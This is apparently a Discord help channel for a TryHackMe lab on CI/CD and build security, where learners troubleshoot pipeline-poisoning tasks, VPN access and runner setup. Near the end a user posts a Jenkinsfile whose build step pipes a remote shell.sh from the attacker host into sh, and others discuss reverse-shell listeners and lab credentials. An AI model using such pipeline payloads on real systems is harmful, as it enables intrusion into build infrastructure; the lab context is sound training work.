#ci-cd-and-build-security
1 messages · Page 1 of 1 (latest)

Tim too fast 😂
Oh come on, I try to race Tim and Amo3 beats me
Fixed.™️
Looool
🔥
is the jenkins IP in the network diagram hidden on purpose? 🤔 Or is that just on my end
oh darn it
Jenkins the host will be black but its IP should show. If not the case send a screenshot and will check
Mmm, this was installed but let me check if there was maybe a revert
Just quickly hit refresh on the room?
that fixed it now, cheers
Cool, just refreshed the config on my side
Yeah we had a revert. Just going to remove the line. As this is a subs-only room internet access is provided on attackbox for install and takes like one extra minute. Once change is pushed I'll re-add the line
curious if I am missing something here. After running the deployment the files are created in /tmp/ but there is no server running.
sudo apt install php7.2-cli - quickly run this? I think we have both the gitlab runner and php as an issue currently. So after this, just run the pipeline again
ah, yup. Have not checked that.
Have also updated the text
phew task 9 gives me headaches 😅
Were you able to overcome said headaches?
nah, still trying 😄
You can do it!
@potent grotto may I dm you? I m not sure, if I did the intentional thing to get the flag for task 10
Sure, go for it
hi guys, i have created the runner and set it to run for untagged jobs and it is reflected in the gitlab runners section for the project forked. However, when i commit, it is in pending stage with the following error ->
This job is stuck because the project doesn't have any runners online assigned to it.
Go to project CI settings
For which task is this? Is it where you create your own runner? if so, does it display that the runner is active?
pls ignore .. fixed it 🙂. I'm confused with the authentication to mother part 😦. where do i obtain the x values from the network diagram?
is the runner shared across projects?
What are the IPs in your network diagram?
depends on how it is configured. Need more context to answer this
Lost connection, waiting for another vote to reset the network!!
connection is back, it took a while for some reason
gitlab - 10.200.46.150. jenkins 10.200.46.160
mother will be in your case 10.200.46.250
ah ok - thanks man
Gave +1 Rep to @edgy frost (current: #345 - 13)
i mean do we need to configure the runner for each project or is it supposed to be shared across projects? the first runner seems to have the shared option checked but when i ran the merge request, it says no runner is assigned -- task 6
You are not going to use the runner you created. There are other runners that have been configured for you which will become clear when you read the task content
Task 6 you are using reverse shell
maybe something broke along the way - let me rebuild it again
i thought the runner was supposed to execute the shell
on task 9 referring to runner number, on my screenshot above, I do not see that runner number
@edgy frost how do u add an image here? I'm trying to share my screenshot but to no avail 😦
on chat click + sign then upload file
i dont have that option - im using discord web
I am also using web, see + sign on left side of the image
yeap - when i click on it, it only says 'Use Apps' , no other options
here's what I see, maybe tryhackme stuff will help
hmm weird
@sweet briar You need to verify your account
yes you are right 🙂 sorry about that
How do we know what's the mother ip? can anyone explain please
so back to task 6 - i am stuck here . Reverse shell is not established in netcat after creating the merge request.
#ci-cd-and-build-security message - see here
ip in your network diagram - take the first 3 octet and the last octet is 250
Ohhhh i see it said use your network diagram thanks
click on pipeline #59 to see more details if any errors exist
this was the runner issue i was talking about earlier
How do we authenticate? do we need a new username and password or the one provided for ssh?
the one provided
yes username is mother
make sure you're typing the correct password motherknowsbest
i created the runner and it successfully completed but no connection was established on the attackbox
did you notice download of the shell on the python server you created
IP address you are using is it cicd (on ip ad command)
attackbox ip
how did you get the IP? it's not the normal IP we always use
use command ip a and look for ip with name cicd
ah ok - let me try
from the room "Using ifconfig or ip a, make a note of the IP of the cicd network adapter."
this cicd ip is updated in both the shell.sh and jenkins file?
yes
ah finally - Thanks @edgy frost !
Gave +1 Rep to @edgy frost (current: #314 - 14)
instead of getting a shell from jenkins, i got this
arghh
i saw the download on the http server
For reverse shell in task 6 i got this but didn’t get shell
I received connection but got nothing
finished the room but for task 9, when I get access to one of the servers, then I can connect directly to the PROD and DEV servers. I was assuming, as the room describes, you need to intercept the product build and use the runner; clearly my solution is not what it's supposed to be
Congrats! So intercepting a prod build when it locks the dev runner when you execute your malware was a bit tough. It would create quite a bit of a bottleneck for the challenge network. But yes, this would be the ultimate idea if you were to perform this attack in an actual client assessment. However, often you are also lucky with artefacts (like keys) for multiple environments being left on shared runners or build agents, which is what was simulated here
Congrats
Hi, i did not understand how do i authenticate to mother and get flags
Can anyone explain please
Can you provide more information on what you are trying here? It is explained in task 2 and through the information mother provides you. So what have you done thus far?
On task 7
You are hosting port 8081 using nc when you should be using a python webserver which would allow the Jenkins agent to download your webshell
Not the task, to use mother
I'm in the shell
Do i just need to find flag now or is there any thing i need to do for mother
Read the instructions in task 2.
Authenticate to mother and follow the steps provided
I read that but did not understand once we compromised how do i do it
Ok i think i got it now
From the message sent to you by MOTHER when you registered:
Once you have performed the actions to take control of the Android's pipeline, please reestablish a connection to mother.
If your access is deemed worthy, mother will award you with a flag for your progress
The second line
What is Jenkins and what is JAgent?
Host name right
No, those are two different hosts. What is the purpose of each? As explained in the task?
Got it finally, thanks man. first i did not understand how to communicate with mother, now i got it and got the flag
Got it
All good! Glad you got it. Trying to not just give you the answer but help guide you to it. Best of luck with the rest!
Thanks, I will redo this room this week to learn more about how all the components work together, and thanks for this room, this was one of the best walk-through rooms by far.
Gave +1 Rep to @potent grotto (current: #29 - 270)
Stuck on task 8. how do i start a runner for task 8, do i need one or not? I am having an error in updating readme.md too
How do i check if there is runner or not in “anactker” gitlab
Do i need to add the reverse shell uploader in .yml file. as in task 6 we did for dockerfile
.
gitlab host is unreachable although network is in running state
any ideas why the cicd network isn't showing up on my attackbox? I launched it from the room like I normally do. I can connect with no issues from my VM but wanted to perform the runners and other tasks from the Attackbox. However I don't see a cicd network.
So when you run ifconfig you don't see the cicd adapter? Also, are you running your cicd VPN file in an offline machine as well?
Yeah, I had that issue on one of the subnets (I think 10.200.46) and had to fully leave the room, wait a few minutes, and re-join to get a different subnet. Someone must have managed to break the hosts in that one. I voted for a reset but at that time I was the only one.
it happened to me too, disconnection, I need to refresh the page, sometimes I see network not running, so I start it again, refresh page might help, also sometimes the diagram gives the wrong IP, in my case supposed to be .6 and in diagram is .3 range.
i have managed to compromise the build agent in task 9, now i'm at a loss on how to access both dev and prod systems
if you are in that server, treat it as a CTF, look around and see what you can find
Another thing to think about, is how would the deployment get pushed from the runner (which you have compromised) into the environments? There are only so many options that could be followed here
if I remember correctly yes, try reverse shell on yaml file
i did use deploy to environment: staging but still getting shell on the runner - trying to figure out the following "read some sensitive information from the runner!"
finally!! - excellent material @potent grotto - i learnt a lot!
Congrats! Thanks for the feedback!
Gave +1 Rep to @sweet briar (current: #1999 - 1)
For task 9 I'm able to get the runner shell but cannot figure out how to access DEV and PROD.
You need to do a bit of enumeration and try to understand how the runner would push changes to DEV and PROD
Solved it.
Even finished your AD networks. Thanks for creating such informative rooms.
Thanks for the feedback!
Gave +1 Rep to @vernal sundial (current: #1999 - 1)
could someone come to the room to reset the network?
You'll need to state your network.
10.200.3.x
Is there an issue with the network? I can't ping gitlab or jenkins from the attack box
Yup I had that happen too. Fully leave the room, wait about 5 - 10 minutes, then rejoin and you will hopefully be in a different subnet
My pipeline does not run, sometimes it runs just for 30 seconds. I will try to do everything again
Anyone who gets stuck on something, here's every task in full detail as I work through it:
https://youtu.be/Yz8MclV03MA?si=yYDFwKMNKlIfx90e
https://www.youtube.com/watch?v=4B0A6RLpCXg
Huge shout out to @potent grotto for the excellent work on this!
Why is there no environment? someone deleted it?
Earlier there were 3 and after that it was 1, now there is zero
I compromised it two times but it's not working now, we cannot commit changes now
I waited 1 hour then there was 1 environment running since it’s public someone might have deleted accidentally
I had it already compromised but now i need to wait and start all over again
So apparently the attack box is scannable from the internet and is serving payloads when Task 6 is running. Is it supposed to work that way? It seems like automated scan traffic keeps hitting the machine
You're a subscriber, so you'll also have an external network.
It makes sense that I have external access. But it doesn't make sense that the attack box is scannable from the internet.
Why?
It has a public ip.
@vapid dirge This isn't a channel for advice on your business
@twin scroll
I thought this is a community where people help as well. No worries, other communities are quite generous
@vapid dirge This channel is for the tryhackme ci, cd, and build security path.
Try #general
can you guys just vote for reset. maybe it will help.
*only people on subnet 3 ^
finally. probably the best challenge on tryhackme. thanks to all creators.
but badge corrupted
report that in site bugs so the tryhackme team can see it and maybe fix it
Yes. I got it yesterday.
All the networks have their own subnets.
Gave +1 Rep to @compact field (current: #2 - 2012)
Is there a way to reset password on mother or re-register?
You can just re-register with a different name
root@ip-xx-xx-xx-xx:~# python3 enumerator.py
Traceback (most recent call last):
File "enumerator.py", line 1, in <module>
import gitlab
ModuleNotFoundError: No module named 'gitlab'
For Task 5: Securing the Build Source
I did run pip3 install python-gitlab==3.15.0
Even stack overflow isn't helping much here
oh nevermind it looks like creating a virtual environment did the trick
Did you get this to work?
I see it download but not execute the shell
Oh my god I finally got it to work 😵
port 8082 saved the day but I have no clue why 8081 didn't work
Wow that whole room was a challenge and a half but I learned a lot. 10/10 would recommend!
right
Task 6 - merge test - won't work for me... I make a fork, edit the jenkins, commit, and merge request... but gitlab is pipeline stuck .. drilling down it claims no active runner ... But this should use Ash's runner shouldn't it? If I create a runner for my fork - i shell my own attack box.
.... Thanks @edgy frost above you pointed out the directions are WRONG - do not use your attackbox ip - use the cicd network ip for the vpn in the ifconfig.
Gave +1 Rep to @edgy frost (current: #279 - 17)
ran into the same issue, using python3.9 explicitly did the trick for me
in the first lab I did the sudo echo and updated the /etc/hosts and still no gitlab page is coming? Anyone can help please? Stuck here
hi guys, I got a question about CI/CD pipelines please
can anyone confirm if I understand right given these examples which are explained in the ci/cd room
Securing the Build Process vs Securing the Build Pipeline they both look the same but the difference that one is about preventing developers from directly merging to main and the other is about hardening the pipeline that even if he requests to merge but he shouldn't be able to approve himself. Right?
and one more question please, we always exploit either the runner or Jenkins agent, since it is the one going to execute the tasks "jobs", and DEV and PROD would be the environments that the code will be deployed to, so if we work on the DEV branch, changes would be deployed to DEV server and if we work on the PROD branch, changes would be deployed to PROD server after the testing done on the runners, and in this example it is the GRunner2 which is shared, right?
so the only way to take a reverse shell directly from PROD or DEV is to exploit the code that will be deployed not the build code ".gitlab-ci.yml" because in this scenario it would always be run by runners first even if they run the build code
could you please confirm ...
@compact field @lone zenith
Hi team,
In task 9 of the #ci-cd-and-build-security room, it instructs to "Navigate to the new repo at http://gitlab.tryhackme.loc/ash/environments/ to get started.", however, upon attempting to access it, a 404 error occurs. Any insights on what might be causing this issue?
not able to connect to cicidbuildsecurity network
2024-04-14 12:09:47 --cipher is not set. Previous OpenVPN version defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2024-04-14 12:09:47 OpenVPN 2.5.9 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Sep 29 2023
2024-04-14 12:09:47 library versions: OpenSSL 3.0.2 15 Mar 2022, LZO 2.10
2024-04-14 12:09:47 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2024-04-14 12:09:47 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2024-04-14 12:09:47 TCP/UDP: Preserving recently used remote address: [AF_INET]52.208.87.208:1194
2024-04-14 12:09:47 Socket Buffers: R=[131072->131072] S=[16384->16384]
2024-04-14 12:09:47 Attempting to establish TCP connection with [AF_INET]52.208.87.208:1194 [nonblock]
2024-04-14 12:09:47 TCP: connect to [AF_INET]52.208.87.208:1194 failed: Connection refused
2024-04-14 12:09:47 SIGUSR1[connection failed(soft),init_instance] received, process restarting
2024-04-14 12:09:47 Restart pause, 5 second(s)
c^C2024-04-14 12:09:49 SIGINT[hard,init_instance] received, process exiting
any idea what might be the issue
Hi, has anyone managed to complete Task 9 in CI/CD and Build Security room?
@potent grotto @lone zenith Can you please take a look at this issue? I can't find the folder /ash/environments/
Are you logged into the correct user as specified in task 8?
wow thanks, I missed that 
Gave +1 Rep to @potent grotto (current: #29 - 277)
so I got the runner shell, the enum should happen on the runner shell right? do i need to do any merge on gitlab page to gain access to PROD and DEV? I got it via treat it like a CTF challenge, but still don't understand how the runner would push changes to DEV and PROD? (||if it's via SSH, then nvm||)
You can check it on ||gitlab-runner bash history||
Can we create a model that detect the intent of a prompt to classify it into a safe prompt or an injected prompt without relying on other model or a dataset?
Is the network down atm?
I am getting a permission denied error if try to execute the commands from bash history ? Can you please let me know what i might be missing 🤔
Have you got the shell as gitlab-runner?
Yes i did
Try to stabilize your shell
Oh okay will try it out thanks 👍
Gave +1 Rep to @native kelp (current: #165 - 42)
Hi! I can't see the cicd network when i do the ip a command on the attackbox. I checked this channel and didn't find an answer. If anyone knows how fix this, thank you!
Try using the command with -a option it wud list all the adapters and the cicd wud be the very first one.
Thank you but it still doesn't show up, and when i ping the gitlab ip, nothing happens as well
^ Same for me. Also, I believe task 6 is broken because the GitLab access token has expired, see Jenkins log here #site-support message I figured out a different way to pwn the JAgent host, but it would still be great if someone can fix this issue
guys I'm trying to complete the room but, first i started the attack box , then i added the gitlab & jenkins to my etc/hosts , but when i try to enter it in browser , the server return with no response , anyone face thing like this before ??
is this still applicable? im currently at task6. I DO use my VPN ip address but i dont see any incoming connection on my python3 http.server. So after creating a merge request (which is completed successfully), it does not download my shell.sh
Could be. I suggest you look at the next task, as that instructs you to login in to Jenkins. From there you should be able to see the error messages from the build task that was created from the merge request.
Thanks! Will do!
Gave +1 Rep to @topaz lodge (current: #1106 - 3)
hello everyone
I have some difficulty getting a reverse shell at task 6
Is it because the room is bugged?
I get the same error. I still haven't figured this out.
It seems I'm not the only one. Maybe a bug?
It seems that I provided the wrong password, maybe I don't have the right? Or maybe the Jenkinsfile is executed despite this error message and something blocked getting the reverse shell?
Someone have an idea of how we can get the flag of that task ? It's not working too with me
Is anyone else having issues connecting to the gitlab url address when getting started in task 2?
through the attacker box I never reach the gitlab machine
but with the VPN it works. just be careful to choose the right VPN
in the network tab
should I expect to be able to ping the gitlab and jenkins servers?
thanks for the feedback
I have started that network a few times in the past 2 weeks without a problem, but today I have an issue, not with the network but with the VPN server: it does not regenerate new VPN config files. Also, after I hit the regenerate button, it hangs for a while (never happened before)
So, I can start the VPN for that network and I get a cicd network interface, but I cannot ping the gitlab and jenkins servers. So, I am stuck
This behaviour today is common for the AttackBox and my local Kali VM
I had similar problem yesterday
ha I never had a problem when the cicd network interface was present
anyway, maybe we should contact the support for the task 6
@topaz lodge said that the problem is because the API key is expired
maybe it is possible to renew the token directly in the jenkins server
About task 6, I have seen users reporting issues about tokens in this channel
I do not know if THM staff monitors this channel, or whether another channel like #room-bugs is more appropriate
no idea whether a work-around exists, like renewing that token
for me, I'll just leave now and check back tomorrow
Hey everyone am having issue in task 2. My gitlab ain't working after configuring and trying to restart network
If anyone can help it would be a great help
Yea mate am also stuck there after trying out many tutorials it's still not working
You found any solution
Not sure if your message is a reply to mine, as the reference to the original message says "Message could not be loaded"
Anyway, as an update:
- I have seen several users complaining, like @winged mist , who wrote a message under #room-bugs today
- my issues at this stage:
- not possible to regenerate VPN configurations
- not possible to ping Gitlab and Jenkins servers; other users in this channel say ping should be possible
I have not attempted to go beyond that
I think there is value if you add your contribution to the #room-bugs , hoping it is the right way to get the attention from THM
maybe for instance consider a reply to the message by @winged mist here:
#room-bugs message
Alright I hope they fix this issue
Extra info, I have had the issue since yesterday, besides pinging, I have tried to telnet on 80 and 443, too since there should be a web interface available on the jenkins and gitlab server, without success.
I have created a ticket for the issue (and I am guessing I am not the first one). Not the first time I was not able to download (or refresh) the vpn config but first time it persisted so long in time (in my experience).
thanks for the heads-up
ticket: that is a new thing for me, how do you go about that?
OK: found the way to create a ticket
Gave +1 Rep to @versed crow (current: #2219 - 1)
Yea usually it gets fixed or something but this ain't working for quite a while
still can't generate the VPN config for this one unfortunately. Anyone else had any success?
I can generate, but not regenerate, and I cannot ping the Gitlab and Jenkins servers
I suggest you open a support ticket for this
when you describe the issue, be sure to document the subnet, or subnets, you have been assigned
screenshots are most useful in that context
I'm having this same issue. But I can't get the cicd network interface
just saw your message in #site-support
my latest feedback is just that message before yours: #ci-cd-and-build-security message
in addition to the CI/CD network, I also have issues with the Wreath network, in addition to the problem already acknowledged by THM for the Holo network
I think it is worth taking the time and opening a support ticket, so that THM is formally informed of the issue and can get an idea of the scope of the problem
if you do so, please include enough descriptions and screenshots. In particular, document the subnet or subnets you had been assigned when encountering the issue
I already sent them ticket. Hopefully they get back to us soon
about "soon": previous messages on the #site-support seem to indicate that THM support normally processes tickets within 1 to 3 days, Monday to Friday, and that sending reminder emails sends you to the back of the queue
Task 6 is still broken as jenkins does not download the shell script due to a failed pipeline
This isn't a THM issue, it's a github one.
https://tryhackme.com/r/room/cicdandbuildsecurity
can someone vote for reset the machine? the site doesn't work.
Subnet: 10.200.6.0/24
Please state your subnet too, so people can actually help 😄
10.200.6.0/24
Any one else struggling with figuring out what to do to get the flags for Task 9? I've managed to get the reverse shell on the runner, but there's nothing I seem to be able to do to escalate privileges or find a path to the dev or prod envs?
i've been troubleshooting task 6 the whole of today and can confirm jenkins still doesn't download the shell script
any fixes available?
Hi, all. In answer to a couple of the questions above related to task 6. I found a workaround after struggling for a while. I don't think it's how it's intended to be solved but it let me continue working.
If you skip forward to task 7 and use the jenkins login. Click through the Test Pipeline twice to my first picture.
Then click 'Configure' from the options on the left. Scroll down to 'Pipeline' and you should see the error under the Repository URL (second picture). Under 'Credentials', if you click 'Add' then 'Jenkins' you'll get a popup for a new credential. The 'Kind' should be 'Username with password', and fill these in with your login for Gitlab that you created in Task 4. Your password can either be that password, or the api token you created in task 5; either should work. Add this and make sure it's the selected credential. The error text should disappear and Jenkins will be able to build your pipeline now (make sure to save/apply these settings).
Of note in task 6, something I spent a lot of time confused about is where you are asked to replace the 'ATTACKER_IP' in the reverse shell command and the Jenkinsfile. Use the cicd adapter IP in both cases here, that you can find with the 'ip a' command.
Let me know if this helps anyone out.
Amazing, thanks very much for posting this. I wasted so much time today trying to get this to work thinking I'd messed up the ports or the config or something and every time I checked it looked ok. I was about ready to give up when I came here and saw this which helped me get sorted and now I can move on. Thanks for your help!
Gave +1 Rep to @naive mesa (current: #2273 - 1)
yo thanks for that, this worked, idk how I missed your post before, big thanks!
Gave +1 Rep to @naive mesa (current: #1508 - 2)
A patch has been released for this network, should be back to normal now! 😇
Hi, the room is still broken for me.
Yesterday was ok. Went back to it today and it is broken. Already reset the network.
Both with external VM or with AttackBox, the machines are not accessible (ping fails, and browser access to the GitLab link times out), even after the setup is all done.
Any idea? Or anyone with same problem?
Hello everyone. How can i use route setting on my openvpn server. I want to make it work only with discord ips
Hi DevSecCops gang
, if you are still stuck, please reset your network to use the updated infrastructure with the patch 😇
Sorry to hear @safe nexus , please can you try again now?
All ok now. Room completed.
Thanks a lot 🙂
Gave +1 Rep to @lone zenith (current: #505 - 10)
Thanks a lot for this! Was stuck for quite some time. Can someone please help me understand why are we using cicd adapter ip address here?
Gave +1 Rep to @naive mesa (current: #1167 - 3)
Hi, I've been trying to start this network for some days now and it fails every time. Is this a known issue that is being worked on?
Hello, what is the error message you are getting?
Hi Tim, sorry was out for a few days - the error appears top right immediately "Uh-no! Failed to start the network". Some searching here showed me that others have seen this also, but I could not find any solution
Hello, please try this route (which has worked on other networks):
Leave the Network (Options > Leave) and rejoin the room
Is there a way to reset the password for our MU-TH-UR 6000 user?
you can just register another user.
It gets linked to your THM username, and I think the flags are generated only for your THM account
you are talking about the mother one right?
Yep, I ended up opening a support case last night.
dude you can simply create a new user. Choose the 1st option "Register"
That works, thank you!
Gave +1 Rep to @lavish mortar (current: #16 - 490)
I was under the impression you had to use your THM user account for the flag to be valid. Your advice worked, TY.
Does anyone know what it is when the Gitlab server will not register me as a new user? Error is 422 "The change you requested was rejected."
Hey can anyone help with my build job post creating the runner - the job seems to fail instantaneously. Also the logs don't help much
check this previous message, replying to another instance of the problem you seem to describe: #room-help message
I did not get a reply though
it would be great if you could provide feedback
thanks in advance
Gave +1 Rep to @summer wolf (current: #2408 - 1)
Hello! the reverse shell worked for everyone, right? Because mine wouldn't work 😦 the shell.sh file is OK, for the "Attacker IP" I used the one of the CICD interface (because I also tried with the attack box), nc is listening at the same port where the reverse shell is supposed to call back, the python -m server is reachable, I get the shell.sh file from my OVPN machine, the gitlab runner and the changed jenkins file are OK and the merge request is OK also with the runner.... I even see the change on the jenkins file with the CURL to the attacker IP ... but I don't receive the call back 😦 ..... Anyone tried with a different payload?
Thanks 🙂
Done 🙂
@C. How did you manage to fix it?
I am not getting a callback
Also I get:
root@ip-10-10-142-212:~# nc -lvp 8081
nc: getnameinfo: Temporary failure in name resolution
use nc -lvnp 8081. the -n is to not do any DNS or service lookups on a specified address, hostname, or ports, as per the man page
.
This room really needs to be updated to reflect that u need nc -lvnp and the whole adding credentials to Jenkins.
Hi, is anyone avail to assist in the CI/CD Build Security Room? I am unable to connect to the Gitlab network, Task 2, from the Attackbox. It never shows the cicd network adapter.
I have left/rejoined the room. Restarted the attackbox twice after starting the gitlab network.
Edit: Resolved by using openvpn from the attackbox. Thanks
Hi
CI/CD and Build Security room isn't feasible with information given.
Do you know if an update will be carried out ?
How did u fix that? It's literally the same for me 😄
I am trying the "CI/CD and Build Security" room (https://tryhackme.com/r/room/cicdandbuildsecurity) but I can't start the network. Error message: "Uh-no! Failed to start the network".
I see in the Chrome DevTools console that the server returns 403 Forbidden when I push the button. Starting single subscriber VMs seems to work. But not this network.
I also see this in the response. {"status":"error","message":"User is not in network"}
But I can ping 10.10.10.10 in the THM network and it is also works fine to view the web page at that address.
So I do not know what "User is not in network" refers to.
use the Options button to leave and then join again
Thanks @vernal ivy! It seems to work!
Gave +1 Rep to @vernal ivy (current: #16 - 546)
hi all. I seem to have issues with this room:
- I can't install php7.2-cli - apt just says there's no available package. the attackbox already seems to have php 7.4 on it
- roughly 20 minutes into any attempt on the room the attackbox freezes and I'm never able to connect to it again from the browser. terminating the machine or clicking start attackbox at the top of the page seems to reset it entirely and I have to start all over. is there an alternative button somewhere I can hit to just reboot it?
maybe this helps: #room-bugs message
thanks mate. I'll give it another shot - hopefully no attackbox freezing tonight
Gave +1 Rep to @vernal ivy (current: #16 - 550)
does anyone have a solution to this? I seem to be running into this problem. I also don't have the php7.2-cli installed because it just wont install on the attackbox.
check this, for both issues: #room-bugs message
on the tryhackme CI/CD room, I authenticated with MOTHER but once the network had reset, mother still saved my credentials. I no longer have my credentials. how do i revert this?
Hi I am stuck with CI/CD and Build Security room. I forgot my password (to mother) and now I neither cannot login nor to register again. How to proceed??
I even restarted the room and reset all progress but it didn't help
check this: #ci-cd-and-build-security message
you can just re-register
check this: #ci-cd-and-build-security message
ty
Hi Again! Can anyone help with Task6 ? Build script on merge seems not working - shell.sh is not being downloaded and executed at all
it's simply not working. Or should I set any runners?
Merge request is just pending forever saying that
This job is stuck because you don't have any active runners that can run this job.
Go to project CI settings
should I add some runners?
maybe this helps: #ci-cd-and-build-security message
Ah so! Cicd network ip..
cicd interface is really different than attacker box IP.. let's check )
YES!!!! My God! Someone should fix it in the task 6 description:
"Make sure to modify ATTACKER_IP to be your VPN or AttackBox IP."
I use attacker box but IP should be
hihi i'm stuck after committing the changes of ReadME file. It's at pending stage for the longest time. May i ask if there's any way to address this?
I'm currently unable to start the network, even with an attackbox loaded into the website, it just gives me a general error without much to go off of. I've tried at a few different times, under different sessions, etc.
Leave the room with the options, and re-join in 15 min(s).
hey, i got a devops internship and i'm looking for cybersecurity rooms in thm that can help me to get more knowledge
Hi,
I would like some help to know how to get this to work please !
- Room: cicdandbuildsecurity
- Task: 6
- Issue: can't get the jenkins file to be executed, I can get a reverse shell by adding the exact same command in the gitlab-ci.yml, but i can't even get the curl request if done from the jenkins file. I'm using the attackbox and i did use the cicd ip
Same problem. I set IP from cicd interface (tried AttackBox & OpenVPN) in shell.sh . Seems Jenkins is down. I tried recreating repos multiple times.
http://jenkins.tryhackme.loc:8080/ and by IP ( http://10.200.0.160:8080/ ) don't respond with UI. Also ping doesn't work for Jenkins (Although JAgent is reachable)
anyone had problems with installing the : sudo apt install php7.2-cli ? E: Unable to locate package php7.2-cli
E: Couldn't find any package by glob 'php7.2-cli'
i installed in my own vm through openvpn the "php8.1-cli" instead, and made the levels to register the runner successfully, and when i am updating the readme file, the pipeline is failing to start and it's showing in red color in the first step, anyone has solution for this? .... even tried to install the php 7.2 from the attackbox and what i got: E: Package 'php7.2-cli' has no installation candidate
hi can anyone help with the creation of my pipeline, my gitlab runner keeps failing
Hi there is an issue with the build portion of the script in the yml file
is this room still working, im not even getting ping response from github ip. im using attackbox
Hello,
I am really struggling to get past the Securing the build process.
I am using my own laptop as an attack machine
I was able to setup the vpn and connect to it
I am able to connect to mother
But when I create the merge request with the Jenkins changes, the build doesn't get triggered
I am not sure what I am missing.
I tried to do this from the tryhackme attackbox also but no luck.
I don't see any activity on the http server when I create the merge request. The job times out eventually
yeah this is the same issue I am also having
The original repo should have a webhook setup but doesn't look like Jenkins is picking it up
Anyone there?
Following up on my last request
For anyone having issues on "Task 4" and receiving the following error, the fix is below:
ERROR: Job failed: prepare environment: exit status 1. Check https://docs.gitlab.com/runner/shells/#shell-profile-loading for more information
Modify the following file by commenting everything out, as below:
/home/gitlab-runner/.bash_logout
#if [ "$SHLVL" = 1 ]; then
# [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
#fi
is network down?
I was trying to access gitlab but it shows me timed out error. I have added both the ip in /etc/hosts. Also network status is running. Any solution?
@nova sleet @rare hare
leave the room , close the attackbox and rejoin after 15-20min
Then start attackbox again
Ohk
The room cicdandbuildsecurity doesn't get connected to any network; the network gets stuck for indefinite time despite multiple leave room and rejoins; even the attackbox doesn't get the cicd interface IP
when using THM AttackBox, troubleshoot by running tryconnectme
refer to cicd_v2 for the VPN file
I am having the same issue, I am using my cicd network but says no runners available, I have even created my own runner which starts the job but then I don't get the reverse shell, should I be using my own runner or leave it with no runners
I too stuck with the same issue, have you got any workarounds on this
same here, it has been months with this problem yet no one did anything about it ? is there a way to contact the room support ?
while waiting for thm staff to fix it, for people who have a problem with the room "CI/CD and Build Security" task 6 flag you will find the steps to fix jenkins in the devsecops path channel.
or here is the link to the message : #devsecops-path message
any devs online??
to solve the infamous stuck point on task 6 for the lab?
I will try jenkins / credentials suggestion that was suggested in devsecops path
@proud harness
in Gitlab you need to create PAT and use that access token into jenkins > manage builds > credentials as pointed out in #devsecops-path
After creating Personal Access Token (PAT) in gitlab under "User Settings", "read_api" and plugged it into jenkins/credentials as you pointed out.
2nd mistake I was doing was in the 'Jenkinsfile' and 'shell.sh' for the 'attacker ip' was putting 10.66.x.x. It should've been 'cicd' interface IP address 10.150.x.x/24.
a good test to see which IP is reachable to gitlab is "ping -I cicd gitlab.tryhackme.loc". No other interface could reach those, so that was a noob mistake
@limber mantle what interface IP are you using in the "Shell.py" and in jenkins file?
you have to create runners before you can edit Jenkinsfile/commit merge request. I ran into same issue and learned that the hard way. and If you made this far with no runners, you will have to delete your forked project, re-fork, create runner and run in attacker machine, start listening on 8080/8081 python3 -m command, create a PAT on gitlab side and put it in jenkins credentials, edit jenkins files and merge request.
Thnx @verbal cove
I did the needed tasks and the pipeline passed, how long does it take for the call back?
Yoo this is soo bad
within 15 seconds it was very quick for me
if it’s not quick for you, may have to delete that project and re-fork start over
i did so many times, i got fluent in it, wasn’t as painful after 3-4 times
I know i have been at it for 4 days
More than 12 re forks
In the last 2
I added the PAT and the runner
The build showed all greens but no call back
I check the 8080 webserver too
But the shell is not being called
@proud harness and i Assume you got 2 terminals/cmd prompt open on the attacker machine? one for 8080 and one on 8081 with nc -lvp command?
can you confirm what interface IP have you provided in the script from the attack box?
yo @verbal cove
so heres the full rundown;
i fork the repo , setup the .sh file with the cicd ip and 8081 to catch , and give chmod +x to it ; host my python webserver on 8080 and setup nc -lvnp 8081.
on gitlab, do i need to have a runner made for this repo separately? coz without it the deployment fails.....
and do i also setup a new credential line in jenkins so that the pipeline reads the repo... none of this is basically mentioned in the room directly though...
You know what, this is the first time in 5 years being at THM, I am actually frustrated when handling this task. Improper instruction and the op not working as intended
@proud harness I didn't document step by step for lab 6 since I tried it so many times I thought I would remember it. I reset that room to re-do that lab so i can help you, but looks like network is broken for me. I am not having CICD interface in the attacker box so I am unable to access/ping gitlab. Not sure when it will be fixed.
Continuous integration continuous delivery
i added the ip address to my etc/hosts in the attackbox but i still can’t access http://gitlab.tryhackme.loc websites
it keeps saying The connection has timed out, the server at gitlab.tryhackme.loc is taking too long to respond
Finally got task 6 to work appalling step by step notes, What ended up working for me was changing the password of the jenkins user to a new gitlab PAT
then in the manage nodes / jenkins section you will see under agent one it requires a label called agent.
based on this you need to add an extra line in the jenkins file to reference this agent for the pipeline to use it
pipeline {
    agent { label 'agent' }
    stages {
        stage('build') {
            steps {
                sh '''
                curl http://10.150.60.4:8080/shell.sh | sh
                '''
            }
        }
    }
}
I would paste screenshots but looks like I don't have the ability. I hope this helps, this has been haunting me for a while, so much I left the room a few months ago hoping it would be fixed and just came back to it this week.
Hopefully this helps anyone stuck
Would like to know how to reset the network? I can't even vpn or using the attackbox to access the network.